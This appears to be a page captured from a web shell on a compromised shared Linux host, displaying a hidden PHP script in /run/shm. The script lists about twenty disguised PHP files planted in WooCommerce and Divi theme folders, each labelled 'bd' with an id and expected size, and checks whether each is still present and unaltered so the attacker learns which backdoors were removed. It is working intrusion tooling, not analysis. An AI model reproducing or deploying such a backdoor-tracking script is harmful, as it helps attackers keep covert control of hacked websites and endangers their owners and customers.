HEX
Server: Apache
System: Linux iad1-shared-e1-26 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: ricpug (13815490)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //run/shm/.rec
<?php   $r = '/home/omoy/tbs.omoy.org'; $x = ["/wp-content/plugins/woocommerce/src/Database/Migrations/CustomOrderTable/class.history.php"=>"bd@@679170@@534",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Categories/lbd.php"=>"bd@@991237@@884",
"/wp-content/plugins/woocommerce/src/Internal/ProductDownloads/ApprovedDirectories/Admin/ereview.php"=>"bd@@991253@@895",
"/wp-content/plugins/woocommerce/src/Internal/Admin/WCPayPromotion/action.category.php"=>"bd@@670485@@537",
"/wp-content/plugins/woocommerce-products-filter/ext/meta_filter/html_types/checkbox/views/woof.options.php"=>"bd@@991263@@1065",
"/wp-content/themes/Divi/includes/builder/feature/content-retriever/retrievers/admin.installer.php"=>"bd@@991267@@828",
"/wp-content/plugins/woocommerce/includes/gateways/cod/class.wc.gateway.cod.php"=>"bd@@743484@@534",
"/wp-content/plugins/woocommerce/packages/action-scheduler/classes/WP_CLI/ActionScheduler_WPCLI_Scheduler_command.php"=>"bd@@617299@@6305",
"/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class.wc.marketplace.suggestions.php"=>"bd@@734317@@439",
"/wp-content/plugins/woocommerce/includes/data-stores/class-wc-shipping-zone-data-store.php"=>"bd@@608368@@11829",
"/wp-content/plugins/woocommerce/vendor/symfony/css-selector/XPath/Extension/FixNesting.php"=>"bd@@694899@@647",
"/wp-content/themes/Divi/includes/builder/frontend-builder/theme-builder/post/query/commands.php"=>"bd@@675468@@535",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/gc_details.php"=>"bd@@715685@@535",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Orders/Stats/leftlinks.php"=>"bd@@992729@@910",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Products/Stats/webdb_view.php"=>"bd@@992737@@909",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/admin.content.php"=>"bd@@991203@@880",
"/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php"=>"bd@@592362@@3881",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/recette_bigstory.php"=>"bd@@992746@@1013",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Utilities/class.news.php"=>"bd@@992753@@937",
"/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Utilities/qtype_numerical.php"=>"bd@@992762@@1095"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');